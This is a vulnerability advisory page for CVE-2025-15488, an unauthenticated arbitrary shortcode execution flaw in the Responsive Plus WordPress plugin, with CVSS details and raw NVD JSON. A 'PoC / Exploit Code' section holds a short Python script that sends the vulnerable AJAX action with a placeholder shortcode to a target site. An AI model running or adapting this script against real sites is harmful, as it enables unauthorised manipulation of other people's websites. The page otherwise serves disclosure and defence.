Security Vulnerability Report
中文
CVE-2025-15488 CVSS 6.5 MEDIUM

CVE-2025-15488

Published: 2026-03-26 07:16:20
Last Modified: 2026-04-15 15:05:48

Description

The Responsive Plus WordPress plugin before 3.4.3 is vulnerable to arbitrary shortcode execution due to the software allowing unauthenticated users to execute the update_responsive_woo_free_shipping_left_shortcode AJAX action that does not properly validate the content_rech_data parameter before processing it as a shortcode.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Responsive Plus < 3.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit(target_url): # Target endpoint for WordPress AJAX url = f"{target_url}/wp-admin/admin-ajax.php" # Payload data # The 'action' parameter triggers the vulnerable function # The 'content_rech_data' contains the malicious shortcode data = { "action": "update_responsive_woo_free_shipping_left_shortcode", "content_rech_data": "[malicious_shortcode]" } try: response = requests.post(url, data=data) if response.status_code == 200: print(f"[+] Request sent successfully to {url}") print(f"[+] Response: {response.text[:200]}") else: print(f"[-] Failed to send request, status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example.com" exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15488", "sourceIdentifier": "[email protected]", "published": "2026-03-26T07:16:19.500", "lastModified": "2026-04-15T15:05:47.827", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Responsive Plus WordPress plugin before 3.4.3 is vulnerable to arbitrary shortcode execution due to the software allowing unauthenticated users to execute the update_responsive_woo_free_shipping_left_shortcode AJAX action that does not properly validate the content_rech_data parameter before processing it as a shortcode."}, {"lang": "es", "value": "El plugin de WordPress Responsive Plus anterior a la versión 3.4.3 es vulnerable a la ejecución arbitraria de shortcodes debido a que el software permite a usuarios no autenticados ejecutar la acción AJAX update_responsive_woo_free_shipping_left_shortcode que no valida correctamente el parámetro content_rech_data antes de procesarlo como un shortcode."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "references": [{"url": "https://wpscan.com/vulnerability/80ce0f88-3065-48c4-a491-b70e067ce4d7/", "source": "[email protected]"}]}}